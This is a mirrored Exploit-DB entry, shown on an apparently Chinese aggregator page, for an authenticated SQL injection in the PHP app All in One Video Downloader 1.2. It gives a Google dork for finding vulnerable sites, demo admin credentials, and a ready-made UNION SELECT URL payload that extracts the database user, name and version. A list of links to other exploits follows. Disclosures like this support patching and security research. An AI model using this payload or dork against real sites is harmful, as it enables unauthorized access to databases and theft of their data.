All in One Video Downloader 1.2 – (Authenticated) SQL Injection

Exploit Database
18 阅读

作者： Deyaa Muhammad

日期： 2019-01-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46077/

# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials: demo@aiovideodl.ml/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A

# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -

# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -

last Exploits
All in One Video Downloader 1.2 – (Authenticated) SQL Injection的更多信息

osCMax 2.5 – ‘/admin/stats_monthly_sales.php?status’ Cross-Site Scripting：
Website Broker Script 3.02 – ‘view’ SQL Injection：
Tailor Management System 1.0 – Unrestricted File Upload to Remote Code Execution：
Funeral Script PHP – Cross-Site Scripting / SQL Injection：
Bludit 3-14-1 Plugin ‘UploadPlugin’ – Remote Code Execution (RCE) (Authenticated)：
WordPress Plugin Contact Form Maker 1.12.20 – SQL Injection：
Campsite 3.3.5 – Cross-Site Request Forgery：
RaidenTunes – ‘music_out.php’ Cross-Site Scripting：